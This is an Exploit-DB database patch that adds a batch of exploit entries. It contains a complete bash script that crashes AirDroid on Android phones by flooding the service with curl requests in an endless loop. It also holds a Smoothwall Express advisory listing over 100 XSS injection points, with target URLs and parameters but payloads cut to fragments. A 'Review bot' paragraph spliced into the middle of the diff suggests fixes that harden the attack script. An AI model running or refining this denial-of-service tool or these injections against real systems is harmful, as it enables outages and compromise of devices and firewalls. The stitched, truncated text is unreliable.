From d622832ea074443732f02a4f99a717cc22cd4400 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 12 Feb 2019 05:01:49 +0000 Subject: [PATCH] DB: 2019-02-12 21 changes to exploits/shellcodes KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (SEH) (PoC) KnFTP 1.0.0 Server - Multiple Buffer Overflows (PoC) (SEH) Jzip - Buffer Overflow (Denial of Service) (SEH Unicode) Jzip - Buffer Overflow (PoC) (SEH Unicode) Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (Denial of Service) (SEH) (PoC) Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (Denial of Service) (SEH) (PoC) Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (PoC) (SEH Overwrite) Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (PoC) (SEH Overwrite) STIMS Buffer 1.1.20 - Buffer Overflow (Denial of Service) (SEH) (PoC) STIMS Buffer 1.1.20 - Buffer Overflow (PoC) (SEH Overwrite) Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service) Zortam Mp3 Media Studio 20.15 - Overflow (PoC) (SEH) Netatalk 3.1.12 - Authentication Bypass (PoC) IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC) Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC) IP-Tools 2.50 - Local Buffer Overflow (PoC) Necrosoft DIG 0.4 - Buffer Overflow (PoC) (SEH Overwrite) FlexHEX 2.46 - Denial of Service SEH Overwrite (PoC) FlexHEX 2.46 - Buffer Overflow (PoC) (SEH Overwrite) Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC) Remote Process Explorer 1.0.0.16 - Buffer Overflow (PoC) (SEH Overwrite) AirDroid 4.2.1.6 - Denial of Service FutureDj Pro 1.7.2.0 - Denial of Service NordVPN 6.19.6 - Denial of Service (PoC) River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH) IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter) River Past Cam Do 3.7.6 - Local Buffer Overflow (SEH) Evince - CBT File Command Injection (Metasploit) Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure Netatalk - Bypass Authentication Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit) NUUO NVRmini - upgrade_handle.php 
Remote Command Execution (Metasploit) Indusoft Web Studio 8.1 SP2 - Remote Code Execution Smoothwall Express 3.1-SP4 - Cross-Site Scripting Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset IPFire 2.21 - Cross-Site Scripting MyBB Bans List 1.0 - Cross-Site Scripting VA MAX 8.3.4 - Authenticated Remote Code Execution CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting Webiness Inventory 2.3 - 'email' SQL Injection --- exploits/android/dos/46337.sh | 95 + exploits/cgi/webapps/46333.txt | 1780 +++++++++++++ exploits/cgi/webapps/46344.txt | 2649 ++++++++++++++++++++ exploits/hardware/webapps/46336.html | 35 + exploits/linux/local/46341.rb | 108 + exploits/linux/webapps/46349.txt | 20 + exploits/multiple/{remote => dos}/46048.py | 0 exploits/multiple/remote/46342.py | 136 + exploits/osx/remote/46339.rb | 127 + exploits/php/remote/46340.rb | 87 + exploits/php/webapps/46347.txt | 23 + exploits/php/webapps/46348.py | 99 + exploits/php/webapps/46350.txt | 46 + exploits/windows/dos/46338.py | 32 + exploits/windows/dos/46343.py | 22 + exploits/windows/dos/46346.py | 44 + exploits/windows/local/46334.py | 119 + exploits/windows/local/46335.py | 67 + exploits/windows/local/46345.py | 49 + files_exploits.csv | 40 +- 20 files changed, 5567 insertions(+), 11 deletions(-) create mode 100755 exploits/android/dos/46337.sh create mode 100644 exploits/cgi/webapps/46333.txt create mode 100644 exploits/cgi/webapps/46344.txt create mode 100644 exploits/hardware/webapps/46336.html create mode 100755 exploits/linux/local/46341.rb create mode 100644 exploits/linux/webapps/46349.txt rename exploits/multiple/{remote => dos}/46048.py (100%) create mode 100755 exploits/multiple/remote/46342.py create mode 100755 exploits/osx/remote/46339.rb create mode 100755 exploits/php/remote/46340.rb create mode 100644 exploits/php/webapps/46347.txt create mode 100755 exploits/php/webapps/46348.py create mode 100644 exploits/php/webapps/46350.txt create mode 100755 
exploits/windows/dos/46338.py create mode 100755 exploits/windows/dos/46343.py create mode 100755 exploits/windows/dos/46346.py create mode 100755 exploits/windows/local/46334.py create mode 100755 exploits/windows/local/46335.py create mode 100755 exploits/windows/local/46345.py diff --git a/exploits/android/dos/46337.sh b/exploits/android/dos/46337.sh new file mode 100755 index 000000000..744d5b8d4 --- /dev/null +++ b/exploits/android/dos/46337.sh 
@@ -0,0 +1,95 @@
+#!/bin/bash
+
+# *****************************************************
+# * Author: Marcelo Vázquez (aka s4vitar) *
+# * AirDroid Denial of Service (DoS) & System Crash *
+# *****************************************************
+
+# Exploit Title: AirDroid Remote Denial of Service (DoS) & System Crash
+# Date: 2019-02-07
+# Exploit Author: Marcelo Vázquez
+# Vendor Homepage: https://web.airdroid.com/
+# Software Link: https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=en
+# Version: AirDroid 4.2.1.6
+# Tested on: Android
+
+#Colours
+greenColour="\e[0;32m\033[1m"
+endColour="\033[0m\e[0m"
+redColour="\e[0;31m\033[1m"
+blueColour="\e[0;34m\033[1m"
+yellowColour="\e[0;33m\033[1m"
+purpleColour="\e[0;35m\033[1m"
+turquoiseColour="\e[0;36m\033[1m"
+grayColour="\e[0;37m\033[1m"
+
+trap ctrl_c INT
+
+function ctrl_c() {
+ echo -e "\n\n${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${grayColour}Exiting...${endColour}\n" && tput cnorm
+ pkill curl > /dev/null 2>&1
+ exit
+}
+
+function check_host(){
+ # Target availability detection
+ echo -e "${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${grayColour} Checking host availability...${endColour}" && sleep 1
+
+ ping -c 1 $host > /dev/null 2>&1
+
+ if [ "$(echo $?)" == "0" ]; then
+ echo -e "\n\t${greenColour}--${endColour}${redColour} Host is active${endColour}${greenColour} --${endColour}\n"
+ else
+ echo -e "\n\t${greenColour}--${endColour}${redColour} Host is inactive${endColour}${greenColour} --${endColour}\n" && tput cnorm && exit
+ fi
+
+ echo -e "${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${grayColour} Checking if port is open...${endColour}" && sleep 1
+
+ if [ "$(nmap -p$port --open -T5 -v -n $host | grep open)" ] && [ "$(nmap -p$port $host -sC -sV | grep -i airdroid)" ]; then
+ echo -e "\n\t${greenColour}--${endColour}${redColour} Port${endColour}${grayColour} $port${endColour}${redColour} is open!!${endColour}${greenColour} --${endColour}\n"
+ echo -e "\t${greenColour}--${endColour}${redColour} ${endColour}${turquoiseColour}Airdroid Service${endColour}${redColour} detected !!${endColour}${greenColour} --${endColour}\n"
+ elif [ "$(nmap -p$port --open -T5 -v -n $host | grep open)" ]; then
+ echo -e "\n\t${greenColour}--${endColour}${redColour} Port is open but it does not correspond to the ${endColour}${turquoiseColour}Airdroid service${endColour}${redColour}!!${endColour}${greenColour} --${endColour}\n" && tput cnorm && exit
+ else
+ echo -e "\n\t${greenColour}--${endColour}${redColour} Port is closed!!${endColour}${greenColour} --${endColour}\n" && tput cnorm && exit
+ fi
+}
+
+function banner()
+{
+ sleep 0.2 && echo -e "\n$redColour /\ $endColour"
+ sleep 0.2 && echo -e "$redColour / \ $endColour"
+ sleep 0.2 && echo -e "$redColour | | $endColour $yellowColour[${endColour}${grayColour}AirDroid Denial of Service (DoS) [System Crash]${endColour}${yellowColour}]${endColour}"
+ sleep 0.2 && echo -e "$redColour | | $endColour ${yellowColour}Author:${endColour}${grayColour} Marcelo Vázquez (aka s4vitar)${endColour}"
+ sleep 0.2 && echo -e "$redColour / == \ $endColour"
+ sleep 0.2 && echo -e "$redColour |/**\| $endColour"
+ sleep 0.2 && for i in $(seq 1 70); do echo -ne "${redColour}-${endColour}"; done && sleep 1 && echo
+}
+
+if [ "$(echo $#)" == "2" ]; then
+ tput civis && banner
+ host=$1 && port=$2
+ echo && check_host
+
+ # Path to launch the message box on the mobile device
+ url="http://$host:$port/sdctl/comm/lite_auth/"
+
+ tput cnorm && echo -ne "${yellowColour}You want to start the attack?${endColour}${grayColour} <${endColour}${redColour}y${endColour}${turquoiseColour}/${endColour}${blueColour}n${endColour}${grayColour}>${endColour}${grayColour}:${endColour} " && read attack_response
+
+ if [ "$(echo $attack_response)" == "y" ]; then
+ counter=0
+
+ # Start launch attack of the message boxes, so the Application crash and the device freezes
+ tput civis && while true; do
+ for i in $(seq 1 3000); do
+ curl --silent "$url" &
+ let counter+=1
+ done && wait
+ echo -e "\n${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${redColour} $counter${endColour}${grayColour} requests successfully sent${endColour}${redColour}!!${endColour}"
+ done
+ else
+ :
+ fi
+else
+ echo -e "\n${blueColour}Usage: ${endColour}${redColour}./airdroid_dos.sh ${endColour}${yellowColour}<${endColour}${grayColour}ip_address${endColour}${yellowColour}>${endColour}${yellowColour} <${endColour}${grayColour}port${endColour}${yellowColour}>${endColour}\n"
+fi
\ No newline at end of file
diff --git a/exploits/cgi/webapps/46333.txt b/exploits/cgi/webapps/46333.txt
new file mode 100644
index 000000000..16e80da50
--- /dev/null
+++ b/exploits/cgi/webapps/46333.txt
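Review bot: The `ctrl_c` trap runs `pkill curl`, which kills every curl process the operator owns rather than only the ones this script forked, and `$host`/`$port` are taken straight from argv and expanded unquoted and unvalidated into the `ping`, `nmap` and `curl` command lines, so a stray space or glob in either argument changes what gets probed; scope the trap to the script's own children, `pkill -P $$ curl > /dev/null 2>&1`, reject a non-numeric port before `check_host` runs, `[[ "$port" =~ ^[0-9]{1,5}$ ]] || { echo "invalid port: $port" >&2; exit 1; }`, and quote both variables wherever they are expanded. The attack loop at the bottom (`while true` around 3000 backgrounded curls per pass) has no exit condition and never looks at a response, so the "requests successfully sent" counter counts forks rather than delivered requests, and the operator's own process/fd limits are likely the first thing to give out; a comment saying the loop runs until Ctrl-C and that the count is not a delivery confirmation would spare the next reader that discovery. Smaller points of style: `if [ "$(echo $?)" == "0" ]` after the ping can be `if ping -c 1 "$host" > /dev/null 2>&1; then`, and `"$(echo $#)"` / `let counter+=1` are just `$#` / `counter=$((counter + 1))`.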
@@ -0,0 +1,1780 @@ +################################################################################################################################## +# Exploit Title: Smoothwall Express 3.1-SP4-polar-x86_64-update9 | +Cross-Site Scripting +# Date: 06.02.2019 +# Exploit Author: Ozer Goker +# Vendor Homepage: http://www.smoothwall.org +# Software Link: +https://sourceforge.net/projects/smoothwall/files/SmoothWall/3.1%20SP4/Express-3.1-SP4-x86_64.iso/download +# Version: 3.1-SP4-polar-x86_64-update9 +################################################################################################################################## + +Introduction +The Smoothwall Open Source Project was set up in 2000 to develop and maintain Smoothwall Express - a Free firewall that includes its own security-hardened GNU/Linux operating system and an easy-to-use web interface. + + +################################################################################# + +XSS details: Reflected & Stored + +################################################################################# + +XSS1 | Stored + +URL +http://192.168.2.200:81/cgi-bin/proxy.cgi? + +METHOD +Post + +PARAMETER +CACHE_SIZE + +PAYLOAD +'> + +################################################################################# + +XSS2 | Stored + +URL +http://192.168.2.200:81/cgi-bin/proxy.cgi? + +METHOD +Post + +PARAMETER +MAX_SIZE + +PAYLOAD +'> + +################################################################################# + +XSS3 | Stored + +URL +http://192.168.2.200:81/cgi-bin/proxy.cgi? + +METHOD +Post + +PARAMETER +MIN_SIZE + +PAYLOAD +'> + +################################################################################# + +XSS4 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/proxy.cgi? + +METHOD +Post + +PARAMETER +MAX_OUTGOING_SIZE + +PAYLOAD +'> + +################################################################################# + +XSS5 | Stored + +URL +http://192.168.2.200:81/cgi-bin/proxy.cgi? 
+ +METHOD +Post + +PARAMETER +MAX_INCOMING_SIZE + +PAYLOAD +'> + +################################################################################# + +XSS6 | Stored + +URL +http://192.168.2.200:81/cgi-bin/urlfilter.cgi + +METHOD +Post + +PARAMETER +REDIRECT_PAGE + +PAYLOAD +'> + +################################################################################# + +XSS7 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/urlfilter.cgi + +METHOD +Post + +PARAMETER +CHILDREN + +PAYLOAD +'> + +################################################################################# + +XSS8 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +BOOT_SERVER + +PAYLOAD +'> + +################################################################################# + +XSS9 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +BOOT_FILE + +PAYLOAD +'> + +################################################################################# + +XSS10 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +BOOT_ROOT + +PAYLOAD +'> + +################################################################################# + +XSS11 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +START_ADDR + +PAYLOAD +'> + +################################################################################# + +XSS12 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +END_ADDR + +PAYLOAD +'> + +################################################################################# + +XSS13 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +DNS1 + +PAYLOAD +'> + +################################################################################# + +XSS14 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? 
+ +METHOD +Post + +PARAMETER +DNS2 + +PAYLOAD +'> + +################################################################################# + +XSS15 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +NTP1 + +PAYLOAD +'> + +################################################################################# + +XSS16 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +NTP2 + +PAYLOAD +'> + +################################################################################# + +XSS17 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +WINS1 + +PAYLOAD +'> + +################################################################################# + +XSS18 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +WINS2 + +PAYLOAD +'> + +################################################################################# + +XSS19 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +DEFAULT_LEASE_TIME + +PAYLOAD +'> + +################################################################################# + +XSS20 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +MAX_LEASE_TIME + +PAYLOAD +'> + +################################################################################# + +XSS21 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +DOMAIN_NAME + +PAYLOAD +'> + +################################################################################# + +XSS22 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +NIS_DOMAIN + +PAYLOAD +'> + +################################################################################# + +XSS23 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? 
+ +METHOD +Post + +PARAMETER +NIS1 + +PAYLOAD +'> + +################################################################################# + +XSS24 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +NIS2 + +PAYLOAD +'> + +################################################################################# + +XSS25 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +STATIC_HOST + +PAYLOAD +'> + +################################################################################# + +XSS26 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +STATIC_DESC + +PAYLOAD +'> + +################################################################################# + +XSS27 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +STATIC_MAC + +PAYLOAD +'> + +################################################################################# + +XSS28 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dhcp.cgi? + +METHOD +Post + +PARAMETER +STATIC_IP + +PAYLOAD +'> + +################################################################################# + +XSS29 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/ddns.cgi? + +METHOD +Post + +PARAMETER +HOSTNAME + +PAYLOAD +'> + +################################################################################# + +XSS30 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/ddns.cgi? + +METHOD +Post + +PARAMETER +DOMAIN + +PAYLOAD +'> + +################################################################################# + +XSS31 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/ddns.cgi? + +METHOD +Post + +PARAMETER +LOGIN + +PAYLOAD +'"> + +################################################################################# + +XSS32 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/ddns.cgi? 
+ +METHOD +Post + +PARAMETER +PASSWORD + +PAYLOAD +'> + +################################################################################# + +XSS33 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/ddns.cgi? + +METHOD +Post + +PARAMETER +COMMENT + +PAYLOAD +'> + +################################################################################# + +XSS34 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/hosts.cgi? + +METHOD +Post + +PARAMETER +IP + +PAYLOAD +'"> + +################################################################################# + +XSS35 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/hosts.cgi? + +METHOD +Post + +PARAMETER +HOSTNAME + +PAYLOAD +'> + +################################################################################# + +XSS36 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/hosts.cgi? + +METHOD +Post + +PARAMETER +COMMENT + +PAYLOAD +'> + +################################################################################# + +XSS37 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/time.cgi? + +METHOD +Post + +PARAMETER +NTP_SERVER + +PAYLOAD +'> + +################################################################################# + +XSS38 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +BATTLEVEL + +PAYLOAD +'> + +################################################################################# + +XSS39 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +RTMIN + +PAYLOAD +'> + +################################################################################# + +XSS40 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +BATTDELAY + +PAYLOAD +'> + +################################################################################# + +XSS41 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? 
+ +METHOD +Post + +PARAMETER +TO + +PAYLOAD +'> + +################################################################################# + +XSS42 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +ANNOY + +PAYLOAD +'> + +################################################################################# + +XSS43 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +UPSIP + +PAYLOAD +'> + +################################################################################# + +XSS44 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +UPSNAME + +PAYLOAD +'> + +################################################################################# + +XSS45 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +UPSPORT + +PAYLOAD +'> + +################################################################################# + +XSS46 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +POLLTIME + +PAYLOAD +'> + +################################################################################# + +XSS47 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +UPSUSER + +PAYLOAD +'> + +################################################################################# + +XSS48 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +NISPORT + +PAYLOAD +'> + +################################################################################# + +XSS49 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +UPSAUTH + +PAYLOAD +'> + +################################################################################# + +XSS50 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? 
+ +METHOD +Post + +PARAMETER +EMAIL + +PAYLOAD +'> + +################################################################################# + +XSS51 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +FROM + +PAYLOAD +'> + +################################################################################# + +XSS52 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +CC + +PAYLOAD +'> + +################################################################################# + +XSS53 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +SMSEMAIL + +PAYLOAD +'> + +################################################################################# + +XSS54 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +SMTPSERVER + +PAYLOAD +'> + +################################################################################# + +XSS55 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +PORT + +PAYLOAD +'> + +################################################################################# + +XSS56 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +USER + +PAYLOAD +'> + +################################################################################# + +XSS57 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/apcupsd.cgi? + +METHOD +Post + +PARAMETER +EMAIL_PASSWORD + +PAYLOAD +'"> + +################################################################################# + +XSS58 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/portfw.cgi? + +METHOD +Post + +PARAMETER +EXT + +PAYLOAD +'> + +################################################################################# + +XSS59 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/portfw.cgi? 
+ +METHOD +Post + +PARAMETER +SRC_PORT_SEL + +PAYLOAD +'> + +################################################################################# + +XSS60 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/portfw.cgi? + +METHOD +Post + +PARAMETER +SRC_PORT + +PAYLOAD +'> + +################################################################################# + +XSS61 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/portfw.cgi? + +METHOD +Post + +PARAMETER +DEST_IP + +PAYLOAD +'> + +################################################################################# + +XSS62 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/portfw.cgi? + +METHOD +Post + +PARAMETER +DEST_PORT_SEL + +PAYLOAD +'> + +################################################################################# + +XSS63 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/portfw.cgi? + +METHOD +Post + +PARAMETER +COMMENT + +PAYLOAD +'> + +################################################################################# + +XSS64 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/outgoing.cgi? + +METHOD +Post + +PARAMETER +MACHINE + +PAYLOAD +'> + +################################################################################# + +XSS65 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/outgoing.cgi? + +METHOD +Post + +PARAMETER +MACHINECOMMENT + +PAYLOAD +'> + +################################################################################# + +XSS66 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dmzholes.cgi? + +METHOD +Post + +PARAMETER +SRC_IP + +PAYLOAD +'> + +################################################################################# + +XSS67 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dmzholes.cgi? + +METHOD +Post + +PARAMETER +DEST_IP + +PAYLOAD +'> + +################################################################################# + +XSS68 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/dmzholes.cgi? 
+ +METHOD +Post + +PARAMETER +COMMENT + +PAYLOAD +'> + +################################################################################# + +XSS69 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/xtaccess.cgi? + +METHOD +Post + +PARAMETER +EXT + +PAYLOAD +'> + +################################################################################# + +XSS70 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/xtaccess.cgi? + +METHOD +Post + +PARAMETER +DEST_PORT + +PAYLOAD +'> + +################################################################################# + +XSS71 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/xtaccess.cgi? + +METHOD +Post + +PARAMETER +COMMENT + +PAYLOAD +'> + +################################################################################# + +XSS72 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/ipblock.cgi? + +METHOD +Post + +PARAMETER +SRC_IP + +PAYLOAD +'> + +################################################################################# + +XSS73 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/ipblock.cgi? + +METHOD +Post + +PARAMETER +COMMENT + +PAYLOAD +'> + +################################################################################# + +XSS74 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/timedaccess.cgi? + +METHOD +Post + +PARAMETER +MACHINES + +PAYLOAD +'> + +################################################################################# + +XSS75 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +GREEN_ADDRESS + +PAYLOAD +'> + +################################################################################# + +XSS76 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +GREEN_NETMASK + +PAYLOAD +'> + +################################################################################# + +XSS77 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? 
+ +METHOD +Post + +PARAMETER +RED_DHCP_HOSTNAME + +PAYLOAD +'> + +################################################################################# + +XSS78 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +RED_ADDRESS + +PAYLOAD +'> + +################################################################################# + +XSS79 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +DNS1_OVERRIDE + +PAYLOAD +'> + +################################################################################# + +XSS80 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +DNS2_OVERRIDE + +PAYLOAD +'> + +################################################################################# + +XSS81 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +RED_MAC + +PAYLOAD +'> + +################################################################################# + +XSS82 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +RED_NETMASK + +PAYLOAD +'> + +################################################################################# + +XSS83 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +DEFAULT_GATEWAY + +PAYLOAD +'> + +################################################################################# + +XSS84 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +DNS1 + +PAYLOAD +'> + +################################################################################# + +XSS85 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/interfaces.cgi? + +METHOD +Post + +PARAMETER +DNS2 + +PAYLOAD +'> + +################################################################################# + +XSS86 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? 
+ +METHOD +Post + +PARAMETER +NAME + +PAYLOAD +'> + +################################################################################# + +XSS87 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? + +METHOD +Post + +PARAMETER +LEFT + +PAYLOAD +'> + +################################################################################# + +XSS88 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? + +METHOD +Post + +PARAMETER +LEFT_SUBNET + +PAYLOAD +'> + +################################################################################# + +XSS89 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? + +METHOD +Post + +PARAMETER +RIGHT + +PAYLOAD +'> + +################################################################################# + +XSS90 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? + +METHOD +Post + +PARAMETER +RIGHT_SUBNET + +PAYLOAD +'> + +################################################################################# + +XSS91 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? + +METHOD +Post + +PARAMETER +SECRET1 + +PAYLOAD +'> + +################################################################################# + +XSS92 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? + +METHOD +Post + +PARAMETER +SECRET2 + +PAYLOAD +'> + +################################################################################# + +XSS93 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? + +METHOD +Post + +PARAMETER +COMMENT + +PAYLOAD +'> + +################################################################################# + +XSS94 | Stored + +URL +http://192.168.2.200:81/cgi-bin/vpnconn.cgi? 
+ +METHOD +Post + +PARAMETER +filename + +PAYLOAD + + +################################################################################# + +XSS95 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat + +METHOD +Post + +PARAMETER +SOURCE_IP + +PAYLOAD +"> + +################################################################################# + +XSS96 | Stored + +URL +http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat + +METHOD +Post + +PARAMETER +FILTER + +PAYLOAD +'> + +################################################################################# + +XSS97 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/ipinfo.cgi? + +METHOD +Post + +PARAMETER +IP + +PAYLOAD +'> + +################################################################################# + +XSS98 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/iptools.cgi? + +METHOD +Post + +PARAMETER +IP + +PAYLOAD +'> + +################################################################################# + +XSS99 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/smoothinfo.cgi? + +METHOD +Post + +PARAMETER +WRAP + +PAYLOAD +'> + +################################################################################# + +XSS100 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/smoothinfo.cgi? + +METHOD +Post + +PARAMETER +SECTIONTITLE + +PAYLOAD +'> + +################################################################################# + +XSS101 | Stored + +URL +http://192.168.2.200:81/cgi-bin/modem.cgi? + +METHOD +Post + +PARAMETER +INIT + +PAYLOAD +'> + +################################################################################# + +XSS102 | Stored + +URL +http://192.168.2.200:81/cgi-bin/modem.cgi? + +METHOD +Post + +PARAMETER +HANGUP + +PAYLOAD +'> + +################################################################################# + +XSS103 | Stored + +URL +http://192.168.2.200:81/cgi-bin/modem.cgi? 
